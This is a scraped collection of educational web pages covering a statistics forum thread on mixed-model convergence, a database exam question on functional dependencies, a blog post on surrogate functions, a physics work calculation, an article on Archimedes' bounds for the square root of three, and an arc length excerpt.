2: In checkConv(attr(opt, "derivs"), opt$par, ctrl = control$checkConv, :
Model failed to converge with max|grad| = 1.10808 (tol = 0.001, component 10)
3: In checkConv(attr(opt, "derivs"), opt$par, ctrl = control$checkConv, :
Model is nearly unidentifiable: large eigenvalue ratio
- Rescale variables?
--> unfortunately this model fails to converge (is it a problem that ID = 504 levels with only 2 observations per level?) Convergence is achieved with glmmPQL() but after droping some unsignficant preditiv variables the model fails to converge again ? What is the Problem here? Could geeglm() be a solution?
In an other attempt I run the model only with "Area" (4 levels) as random effect (my expectation is that Ind. in the same geogr. Area are suffering from the same parasite pressure etc.) and received the follwoing p-Values.
## My model in R:
mod_converges <- glmer( T_hydat ~ Celebration + Sex + RelAge + SheepDog + InfectionPeriodT_hydat + Urbanisation + (1|Area), family = binomial)
## mod_converges output:
summary(mod_converges)
Generalized linear mixed model fit by maximum likelihood (Laplace Approximation) ['glmerMod']
Family: binomial ( logit )
Formula: T_hydat ~ Celebration + sex + SheepDog + RelAge + Urbanisation +
InfectionPeriodT_hydat + (1 | Area)
Data: dat
AIC BIC logLik deviance df.resid
203.0 262.0 -89.5 179.0 996
Scaled residuals:
Min 1Q Median 3Q Max
-0.461 -0.146 -0.088 -0.060 31.174
Random effects:
Groups Name Variance Std.Dev.
Area (Intercept) 0.314 0.561
Number of obs: 1008, groups: Area, 4
Fixed effects:
Estimate Std. Error z value Pr(>|z|)
(Intercept) -6.81086 1.96027 -3.47 0.00051 ***
Celebration1 1.36304 0.57049 2.39 0.01688 *
sexm -0.18064 0.49073 -0.37 0.71279
SheepDog1 2.02983 0.51232 3.96 7.4e-05 ***
RelAge2 0.34815 1.18557 0.29 0.76902
RelAge3 0.86344 1.05729 0.82 0.41412
RelAge4 -0.54501 1.43815 -0.38 0.70471
RelAge5 0.85741 1.25895 0.68 0.49584
UrbanisationU 0.17939 0.78669 0.23 0.81962
UrbanisationV 0.01237 0.59374 0.02 0.98338
InfectionPeriodT_hydat 0.00324 0.01159 0.28 0.77985
---
Signif. codes: 0 ‘***’ 0.001 ‘**’ 0.01 ‘*’ 0.05 ‘.’ 0.1 ‘ ’ 1
This model converges with "Sample_ID" as a random effect, however, as statet by usεr11852 the varaince of the random effect is quiet high 4.095497^2 = 16.8. And the std.error of Area5 is far to high (complete separation). Can I just remove Datapoints from Area5 to overcome this Problem?
# T_hydat
# Area 0 1
# 1 226 4
# 2 203 3
# 4 389 15
# 5 168 0 ## here is the problematic cell
Linear mixed-effects model fit by maximum likelihood
Data: dat
AIC BIC logLik
NA NA NA
Random effects:
Formula: ~1 | Sample_ID
(Intercept) Residual
StdDev: 4.095497 0.1588054
Variance function:
Structure: fixed weights
Formula: ~invwt
Fixed effects: T_hydat ~ Celebration + sex + SheepDog + YoungOld + Urbanisation + InfectionPeriodT_hydat + Area
Value Std.Error DF t-value p-value
(Intercept) -20.271630 1.888 502 -10.735869 0.0000
Celebration1 5.245428 0.285 502 18.381586 0.0000
sexm -0.102451 0.877 495 -0.116865 0.9070
SheepDog1 3.356856 0.879 495 3.817931 0.0002
YoungOldyoung 0.694322 1.050 495 0.661017 0.5089
UrbanisationU 0.660842 1.374 495 0.480990 0.6307
UrbanisationV 0.494653 1.050 495 0.470915 0.6379
InfectionPeriodT_hydat 0.059830 0.007 502 8.587736 0.0000
Area2 -1.187005 1.273 495 -0.932576 0.3515
Area4 -0.700612 0.973 495 -0.720133 0.4718
Area5 -23.436977 28791.059 495 -0.000814 0.9994
Correlation:
(Intr) Clbrt1 sexm ShpDg1 YngOld UrbnsU UrbnsV InfPT_ Area2 Area4
Celebration1 -0.467
sexm -0.355 0.018
SheepDog1 -0.427 0.079 0.066
YoungOldyoung -0.483 0.017 0.134 0.045
UrbanisationU -0.273 0.005 -0.058 0.317 -0.035
UrbanisationV -0.393 0.001 -0.138 0.417 -0.087 0.586
InfectionPeriodT_hydat -0.517 0.804 0.022 0.088 0.016 0.007 0.003
Area2 -0.044 -0.035 -0.044 -0.268 -0.070 -0.315 -0.232 -0.042
Area4 -0.213 -0.116 -0.049 -0.186 -0.023 -0.119 0.031 -0.148 0.561
Area5 0.000 0.000 0.000 0.000 0.000 0.000 0.000 0.000 0.000 0.000
Standardized Within-Group Residuals:
Min Q1 Med Q3 Max
-14.208465914 -0.093224405 -0.022551663 -0.004948562 14.733133744
Number of Observations: 1008
Number of Groups: 504
Output from logistf (Firth's penalized-likelihood logistic regression)
logistf(formula = T_hydat ~ Celebration + sex + SheepDog + YoungOld +
Urbanisation + InfectionPeriodT_hydat + Area, data = dat,
family = binomial)
Model fitted by Penalized ML
Confidence intervals and p-values by Profile Likelihood Profile Likelihood Profile Likelihood Profile Likelihood Profile Likelihood Profile Likelihood Profile Likelihood Profile Likelihood Profile Likelihood Profile Likelihood Profile Likelihood
coef se(coef) lower 0.95 upper 0.95 Chisq
(Intercept) -5.252164846 1.52982941 -8.75175093 -2.24379091 12.84909207
Celebration1 1.136833737 0.49697927 0.14999782 2.27716500 5.17197661
sexm -0.200450540 0.44458464 -1.09803320 0.77892986 0.17662930
SheepDog1 2.059166246 0.47197694 1.10933774 3.12225212 18.92002321
YoungOldyoung 0.412641416 0.56705186 -0.66182554 1.77541644 0.50507269
UrbanisationU 0.565030324 0.70697218 -0.98974390 1.97489240 0.56236485
UrbanisationV 0.265401035 0.50810444 -0.75429596 1.33772658 0.25619218
InfectionPeriodT_hydat -0.003590666 0.01071497 -0.02530179 0.02075254 0.09198425
Area2 -0.634761551 0.74958750 -2.27274031 0.90086554 0.66405078
Area4 0.359032194 0.57158464 -0.76903324 1.63297249 0.37094569
Area5 -2.456953373 1.44578029 -7.36654837 -0.13140806 4.37267766
p
(Intercept) 3.376430e-04
Celebration1 2.295408e-02
sexm 6.742861e-01
SheepDog1 1.363144e-05
YoungOldyoung 4.772797e-01
UrbanisationU 4.533090e-01
UrbanisationV 6.127483e-01
InfectionPeriodT_hydat 7.616696e-01
Area2 4.151335e-01
Area4 5.424892e-01
Area5 3.651956e-02
Likelihood ratio test=36.56853 on 10 df, p=6.718946e-05, n=1008
Wald test = 32.34071 on 10 df, p = 0.0003512978
** glmer Model (Edited 28th Jan 2016)**
Output from glmer2var: Mixed effect model with the 2 most "important" variables ("Celebration" = the factor I am interested in and "SheepDog" which was found to have a significant influence on infection when data before and after the celebration were analysed separately.) The few number of positives make it impossible to fit a model with more than two explanatory variables (see commet EdM).
There seems to be a strong effect of "Celebration" that probably cancels out the effect of "SheepDog" found in previous analysis.
Generalized linear mixed model fit by maximum likelihood (Laplace Approximation) ['glmerMod']
Family: binomial ( logit )
Formula: T_hydat ~ Celebration + SheepDog + (1 | Sample_ID)
Data: dat
AIC BIC logLik deviance df.resid
113.0 132.6 -52.5 105.0 1004
Scaled residuals:
Min 1Q Median 3Q Max
-4.5709 -0.0022 -0.0001 0.0000 10.3491
Random effects:
Groups Name Variance Std.Dev.
Sample_ID (Intercept) 377.1 19.42
Number of obs: 1008, groups: Sample_ID, 504
Fixed effects:
Estimate Std. Error z value Pr(>|z|)
(Intercept) -19.896 4.525 -4.397 1.1e-05 ***
Celebration1 7.626 2.932 2.601 0.00929 **
SheepDog1 1.885 2.099 0.898 0.36919
---
Signif. codes: 0 ‘***’ 0.001 ‘**’ 0.01 ‘*’ 0.05 ‘.’ 0.1 ‘ ’ 1
Correlation of Fixed Effects:
(Intr) Clbrt1
Celebratin1 -0.908
SheepDog1 -0.297 -0.023
## Question 2:
2) Can I use drop1() to get the final model and use the p-Values from summary(mod_converges) for interpretation? Does my output tell me if it makes sense to include the random effect ("Area") ?
Generalized linear mixed model fit by maximum likelihood (Laplace Approximation) ['glmerMod']
Family: binomial ( logit )
Formula: T_hydat ~ Celebration + SheepDog + (1 | Area)
Data: dat
AIC BIC logLik deviance df.resid
190.8 210.4 -91.4 182.8 1004
Scaled residuals:
Min 1Q Median 3Q Max
-0.369 -0.135 -0.096 -0.071 17.438
Random effects:
Groups Name Variance Std.Dev.
Area (Intercept) 0.359 0.599
Number of obs: 1008, groups: Area, 4
Fixed effects:
Estimate Std. Error z value Pr(>|z|)
(Intercept) -5.912 0.698 -8.47 < 2e-16 ***
Celebration1 1.287 0.512 2.51 0.012 *
SheepDog1 2.014 0.484 4.16 3.2e-05 ***
---
Signif. codes: 0 ‘***’ 0.001 ‘**’ 0.01 ‘*’ 0.05 ‘.’ 0.1 ‘ ’ 1
Correlation of Fixed Effects:
(Intr) Clbrt1
Celebratin1 -0.580
SheepDog1 -0.504 0.027
I know there are quite a few questions but I would really appreciate some advice from experienced people. Thanks!
• With only 22 observations showing an infection, you shouldn't be trying to fit more than 1 or 2 predictor variables (degrees of freedom). See this page, for example. – EdM Jan 26 '16 at 18:31
• Can you include the output from your original model? Specification-wise, it makes the most sense to me, though it may be over-parametrized if you only have 22 positive observations. You might try fitting it with the package blme, which adds some regularization to the fixed and/or random effects, and can help with issues of parameters being forced to the boundaries of the parameter space (both linear separation and zero-variance random effects). – Andrew M Jan 26 '16 at 18:44
• @Edm, Thanks for this advice. So I seem to be restricted in analyzing this data and can only make the best out of it. If I run the model with the 2 variable "Celebration" and "SheepDog" (the variables I suspect to be the most important) the model converges and the output seems to reasonable to me (output added (glmer2var)). Would you agree with that procedure? – organutan Jan 28 '16 at 13:22
• @AndrewM, I don't exactely understand what you mean with "original model". Are you talking about the mixed model with ID as random effect which didn't converge? – organutan Jan 28 '16 at 13:23
• You don't want to lose the information about the paired comparisons. Also, it seems that you want to focus on the effects of the celebration. How many individuals were infected before the celebration? Did any of those lose the infection after the celebration? – EdM Jan 28 '16 at 14:26
I think that your original model with 504 levels with each level having two readings is problematic because it potentially suffers from complete separation, especially given the small number of positives in your sample. By complete separation I mean that for a given combination of covariates all responses are the same (usually 0 or 1). You might want to try a different optimizer (ie. something along the lines glmerControl(optimizer='bobyqa','Nelder_Mead', etc., ...) but I would not be very confident that this would work either. In general having some levels with one or two observations is not a problem but when all of them are so low things become computationally odd because you starts having identifiability issues (eg. you definitely cannot evaluate any slopes as a random slope plus a random intercept for every individual would give you one random effect for every observation). You really lose a lot of degrees of freedom any way you count them. You do not show the glmmPQL output but I suspect a very high variance of the random effect that would strongly suggest that there is complete separation. (EDIT: You now show that output and can you can clearly see that the ratio is indeed very high.) You might want to consider using the function logistf from the package with the same name. logistf will fit a penalized logistic regression model that will probably alleviate the issue you experience; it will not use any random effects.
The rule of thumb for the lowest number of levels a random effect can be estimated reasonably is "5 or 6"; below that your estimate for the standard deviation of that effect would really suffer. With this in mind, no; you using Area having just four (4) levels is too aggressive. Probably it makes more sense to use it a fixed effect. In general if I do not get at least 10-11 random effects I am a bit worried about the validity of the random effects assumption; we are estimating a Gaussian after-all.
Yes, you could use drop1 but really be careful not to start data-dredging (which is a bad thing). Take any variable selection procedure with a grain of salt. This is issue is extesnsively discussed in Cross-Validated; eg. see the following two great threads for starters here and here. Maybe it is more reasonable to include certain "insignificant" variables in a model so one can control for them and then comment on why they came out insignificant rather then just break down a model to the absolutely bare-bone where everything is uber-signficant. In any case I would strongly suggest using bootstrap to get confidence intervals for estimated parameters.
• I am glad I could help. Just to clarify, logistf will not include a random effect. All effects will be fixed in that sense. (I will add this clarification to the original answer). – usεr11852 Jan 26 '16 at 18:18
• @AndrewM: I see your point and it is not ungrounded but in the current case I think that consistently two measurements per subject do not warrant a full mixed model. You need to regularize something, using logistf does this; your comment about using blme is just another way of doing this regularization especially given the small # of positives. Look at the ratio of variances in glmmPQL output: 600+? In that sense maybe using rare event logistic regression relogit from Zelig is relevant too. (That's why the complete separation comment.) – usεr11852 Jan 26 '16 at 19:09 | 2020-02-26 08:34:15 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6360245943069458, "perplexity": 4320.990022195608}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-10/segments/1581875146187.93/warc/CC-MAIN-20200226054316-20200226084316-00222.warc.gz"} |
https://gateoverflow.in/855/gate2002-2-25 | 1.5k views
Form the following instance of a relation schema $R(A,B,C)$, we can conclude that:
A B C $1$ $1$ $1$ $1$ $1$ $0$ $2$ $3$ $2$ $2$ $3$ $2$
1. $A$ functionally determines $B$ and $B$ functionally determines $C$
2. $A$ functionally determines $B$ and $B$ does not functionally determine $C$
3. $B$ does not functionally determine $C$
4. $A$ does not functionally determine $B$ and $B$ does not functionally determine $C$
edited | 1.5k views
"Form the following instance of a relation schema R(A,B,C)"
Relation = one table
Instance = values at one moment ( as opposed to the schema, which is the description of all possible values)
Ans. $C$
Generally Normalization is done on the schema itself.
From the relational instance given,we may strike out $FD$ s that do not hold.
e.g. $B$ does not functionally determine $C$(This is true).
But we cannot say that A functionally determines B for the entire relation itself.This is because that , $A->B$ holds for this instance,but in future there might be some tuples added to the instance that may violate $A->B$.
So overall on the relation we cannot conclude that $A->B$,from the relational instance which is just a subset of an entire relation.
edited by
• If we observe carefully "Instance" of a relation Schema R(A,B,C) is given here.
Now as we can see A functionally determines B for the present tuples.
But B does not determines C. That is clearly Visible.
• In future there may be chances of tuples to be present where A can not determine B uniquely.
So,option C is most suitable.
ans is c
When value of A is 1,B is 1.When value of A is 2,B is 3.So A functionally determines B.
When value of B is 1,C is 1 and in another case C is 0.So B does not functionally determine C.
Ans will be B
Here A->B satisfies(for same value in A , B also gives unique value)
B->C not satisfies(when B is 1 , C gives two values 1,0)
For the given instance yes, but there can be another instance also for R where the FD may not hold. So, from a given instance we can only say "no FD".
srestha @Arjun sir
question says ,Form the following instance of a relation so according to that B should be answer .why we are considering other possibilities ?pls clear this
Suppose a person from religion X throws a bomb. From this can we conclude that religion X is teaching terrorism?
Likewise everything depends on the definition. FD is defined on relational schema and not on any instance alone. | 2018-03-20 12:02:34 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5753593444824219, "perplexity": 1504.6910177969594}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-13/segments/1521257647406.46/warc/CC-MAIN-20180320111412-20180320131412-00720.warc.gz"} |
https://hbfs.wordpress.com/2011/07/26/surrogate-functions/ | ## Surrogate Functions
In some optimizations problems, the objective-function is just too complicated to evaluate directly at every iteration, and in this case, we use surrogate functions, functions that mimic most of the properties of the true objective-function, but that is much simpler analytically and/or computationally.
Lately, I have done some thinking about what properties a surrogate function (or surrogate model) should have to be practical.
The Wikipedia on surrogate models is informative, but leaves many questions opened.
For example, should a surrogate function have its derivative’s zeroes in the same place as the real function’s derivative? Should it have its derivative’s signs match the signs of the real function’s derivatives?
In some cases, it’s quite possible to do have such a surrogate function. Let’s suppose you need to know, not the exact distance, but which points on a sphere is further than an other. If you’re dealing with the unit sphere centered on $(0,0,0)$ and points expressed as $x$, $y$, $z$, coordinates also centered on $(0,0,0)$, then if $u$ is a point and $v$ another, $\cos^{-1}(u^Tv)$ is the distance between $u$ and $v$ as measured on the sphere.
But let’s pretend that, for some reason, $\cos^{-1}(u^Tv)$ is troublesome to compute. We will want to use the surrogate $\|u-v\|$, the $L_2$, or Euclidean distance, between the two points $u$ and $v$.
The surrogate $\|u-v\|$ is well behaved, relative to $\cos^{-1}(u^Tv)$. As for $\cos^{-1}(u^Tv)$, if you rotate $u$ around $v$, $\|u-v\|$ is unchanged. If you bring $u$ closer to $v$ (while remaining on the sphere), both decrease—while not a the same rate. If you push $u$ further from $v$, both grow—again not at the same rate.
The figure illustrates the regions:
*
* *
So $\|u-v\|$ behaves mostly as $\cos^{-1}(u^Tv)$, and, by hypothesis, is much easier to compute (if a square root is a lot less costly to compute than arccos, which remains to be seen). For many algorithms, $\|u-v\|$ could be used as a cromulent surrogate.
This is of course a rather simple example of surrogate, and I wonder how much one can build into the surrogate. What are the conditions for a surrogate to be well-behaved? What does it even mean to be well-behaved?
I searched a bit but found precious little on the topic. I now uncompunctiously ask from you, reader, to hint me, to suggest me books, articles, or any resources on the topic. | 2015-04-19 12:32:52 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 28, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8606894016265869, "perplexity": 362.91534301915834}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-18/segments/1429246639057.4/warc/CC-MAIN-20150417045719-00151-ip-10-235-10-82.ec2.internal.warc.gz"} |
https://socratic.org/questions/how-much-work-does-it-take-to-raise-a-46-kg-weight-3-m | # How much work does it take to raise a 46 kg weight 3 m ?
Mar 8, 2016
$W = {E}_{p} = 1353 , 78 J$
$W = {E}_{p} = m \cdot g \cdot h$
$\text{W:Work doing " E_p :"Potential Energy of Object } h : 3 m$
$W = {E}_{p} = 46 \cdot 9 , 81 \cdot 3$
$W = {E}_{p} = 1353 , 78 J$ | 2019-09-22 22:23:21 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 5, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.1926179975271225, "perplexity": 1077.0405947828965}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514575751.84/warc/CC-MAIN-20190922221623-20190923003623-00231.warc.gz"} |
https://math.stackexchange.com/questions/2285319/nonhomogeneous-one-dimensional-transport-equation-with-boundary-condition-on-x | # Nonhomogeneous one-dimensional transport equation with boundary condition on $(x,t):x+t = 0$ instead of $t=0$
Consider the transport equation (see e.g. Evans p19) The solution of the initial value problem $u_t + b \cdot Du = f$ in $\mathbb R^n \times (0,\infty)$ with initial condition $u = g$ on $\mathbb R^n \times \{t=0\}$. is given by $u(x,t) = g(x-tb) + \int^t_0 f(x+(s-t)b,s) ds \quad (x \in \mathbb R^n, t \geq 0)$
Now, what if we have the following ($n=1$) problem: $u_t+u_x = 1$ ($f \equiv 1$ constant) in the domain $\{(x,t) \in \mathbb R^2: x+t > 0\}$ with the condition $u(r,-r) = \sin(r)$ (which is the boundary of the domain)
Can we, to solve this, apply the solution formula of the initial value problem and if so, how? (do we need to perform a transformation?) Is this still called initial value problem or is it a boundary problem?
• Regards @Mekanik. If I may, in your case, I don't think it is an initial value problem, since at $t=0$ we only know $u(0,0)=\sin(0)=0$. What is the PDE when $(x,t)$ is not in the domain? What is $f$ outside the domain in particular. – Arief Anbiya May 17 '17 at 17:51
• I dont really understand your question. We look for a function $u$ which is defined only in this open domain and there it should solve the given transport equation. – Mekanik May 17 '17 at 19:37
Initial value problems are a particular case of boundary value problems, where the solution is known at $t=0$. Here, we have a boundary value problem, where the solution is known on the line $t=-x$.
For the non-homogeneous advection equation $u_t + u_x = 1$, the method of characteristics gives the Lagrange-Charpit equations $$\frac{\text{d}t}{1} = \frac{\text{d}x}{1} = \frac{\text{d}u}{1} \, .$$ Therefore, the characteristic curves in the $x$-$t$ plane are parallel straight lines with equation $x(t) = x_0 + t-t_0$, on which $u$ is not constant: \begin{aligned} u(x(t),t) &= u(x_0,t_0) + t-t_0\, . \end{aligned} Now, since $u$ is known on the line $t=-x$, we select characteristics starting on this line, i.e., $t_0 = -x_0 = x_0 - x(t) + t$. Thus, $x_0 = \frac{1}{2}(x(t)-t)$, and \begin{aligned} u(x,t) &= u\left(\tfrac{1}{2}(x-t),\tfrac{1}{2}(t-x)\right) + t + \tfrac{1}{2}(x-t) \\ &= \sin\left(\tfrac{1}{2}(x-t)\right) + \tfrac{1}{2}(x+t) \, . \end{aligned} | 2019-10-23 10:14:12 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.998038113117218, "perplexity": 146.13736826803006}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570987833089.90/warc/CC-MAIN-20191023094558-20191023122058-00225.warc.gz"} |
http://www.maa.org/publications/periodicals/convergence/a-disquisition-on-the-square-root-of-three-an-archimedean-conundrum | # A Disquisition on the Square Root of Three - An Archimedean Conundrum
Author(s):
Robert J. Wisner (New Mexico State University)
A conundrum is a riddle having only conjectural answers, and a long-standing mathematical conundrum with numerous conjectural answers is centered on how Archimedes, in his Measurement of a Circle, arrived at his famous inequality $\frac{265}{153}<\sqrt{3}<\frac{1351}{780}.$ In the first pages of [1], Heath offers only what are called "probable steps" that would lead to these inequalities. In [2], Dickson states that the two approximations, " . . . can be explained in connection with $$x^{2}-3y^{2}=-2$$, $$x^{2}-3y^{3}=1,$$" but gives no hint that Archimedes proceeded in such a manner.
In [3], Dijksterhuis argues that Archimedes might have used what is called "the Babylonian rule," equivalent to Newton’s Method for the function $$y=x^{2}-3,$$ to arrive at $$\frac{1351}{780}$$, but that rule doesn't explain the other fraction, except indirectly by means of what seems to be a curious supposition and roundabout calculations. (The Babylonian Rule asserts that in estimating a square root, make a simple but reasonable guess, then average your guess with the radicand divided by your guess to obtain a better estimate, then repeat. In our case, beginning with $$x=1$$, and computing the average of $$x$$ and $$\frac{3}{x}$$ through four iterations yields the sequence of four estimates obtained on page 4.) Heath (again) in [4] seems to mention the inequalities only in a passing manner, and Stein [5] curiously does not mention these famous Archimedean inequalities at all. To see how much attention has been paid to speculation about the above inequalities, visit the website Archimedes and the Square Root of 3.
Recall that Occam's Razor asserts that among competing explanations, the simplest is the most likely to be correct. To that end, notice that the two fractions involved here are contained in rungs nine and twelve of the Greek ladder for $$\sqrt{3}$$ on the second page of this paper. That would seem to be the simplest explanation all right, but did Archimedes know of Greek ladders or something equivalent? Did he realize that
if $$\frac{a}{b}$$ is an approximation to $$\sqrt{3},$$
then $$\frac{3a+b}{a+b}$$ is a better one?
Because this, beginning with $$\frac{1}{1}$$ and iterating, yields – exactly – the rungs of the classical Greek ladder for $$\sqrt{3}$$. It would seem that knowing of Greek ladders or something equivalent is a reasonable supposition, as is suggested on the second page of [6] in a quote from [2], wherein it is urged that the ancients seemed to know of Greek ladders or something equivalent to them.
On many classroom occasions over the years, I have used Greek ladders to get simple approximations. I have also on occasion described this conundrum about the Archimedean approximations to $$\sqrt{3}$$, and students always seem surprised that there can be such current disagreements and open questions among mathematicians about so ancient a topic. This opens the door for more dialog about the open-ended nature of mathematical discovery as well as of our current understanding of the ancient history of mathematics.
Robert J. Wisner (New Mexico State University), "A Disquisition on the Square Root of Three - An Archimedean Conundrum," Loci (December 2010), DOI:10.4169/loci003514 | 2014-09-18 19:11:23 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6923899054527283, "perplexity": 847.9926331303702}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-41/segments/1410657128337.85/warc/CC-MAIN-20140914011208-00314-ip-10-196-40-205.us-west-1.compute.internal.warc.gz"} |
http://www.theinfolist.com/html/ALL/s/arc_length.html | TheInfoList
Arc length is the distance between two points along a section of a curve. Determining the length of an irregular arc segment is also called of a curve. The advent of infinitesimal calculus led to a general formula that provides closed-form solutions in some cases.
General approach
A curve in the plane can be approximated by connecting a finite number of points on the curve using line segments to create a polygonal path. Since it is straightforward to calculate the length of each linear segment (using the Pythagorean theorem in Euclidean space, for example), the total length of the approximation can be found by summing the lengths of each linear segment; that approximation is known as the ''(cumulative) chordal distance''. If the curve is not already a polygonal path, using a progressively larger number of segments of smaller lengths will result in better approximations. The lengths of the successive approximations will not decrease and may keep increasing indefinitely, but for smooth curves they will tend to a finite limit as the lengths of the segments get arbitrarily small. For some curves there is a smallest number $L$ that is an upper bound on the length of any polygonal approximation. These curves are called and the number $L$ is defined as the .
Definition for a smooth curve
Let $f\colon,bto\R^n$ be an injective and continuously differentiable function. The length of the curve defined by $f$ can be defined as the limit of the sum of line segment lengths for a regular partition of
Finding arc lengths by integrating
If a planar curve in $\mathbb^2$ is defined by the equation $y=f\left(x\right),$ where $f$ is continuously differentiable, then it is simply a special case of a parametric equation where $x = t$ and $y = f\left(t\right).$ The arc length is then given by: :$s=\int_a^b \sqrtdx.$ Curves with closed-form solutions for arc length include the catenary, circle, cycloid, logarithmic spiral, parabola, semicubical parabola and straight line. The lack of a closed form solution for the arc length of an elliptic and hyperbolic arc led to the development of the elliptic integrals.
Numerical integration
In most cases, including even simple curves, there are no closed-form solutions for arc length and numerical integration is necessary. Numerical integration of the arc length integral is usually very efficient. For example, consider the problem of finding the length of a quarter of the unit circle by numerically integrating the arc length integral. The upper half of the unit circle can be parameterized as $y=\sqrt.$ The interval $x\in\sqrt/2, \sqrt/2$ corresponds to a quarter of the circle. Since $dy/dx=-x/\sqrt$ and $1+\left(dy/dx\right)^2 = 1/\left(1-x^2\right),$ the length of a quarter of the unit circle is :$\int_^\frac \, dx.$ The 15-point Gauss–Kronrod rule estimate for this integral of differs from the true length of :$\Bigarcsin x\Big_=\frac \pi 2$ by and the 16-point Gaussian quadrature rule estimate of differs from the true length by only . This means it is possible to evaluate this integral to almost machine precision with only 16 integrand evaluations.
Curve on a surface
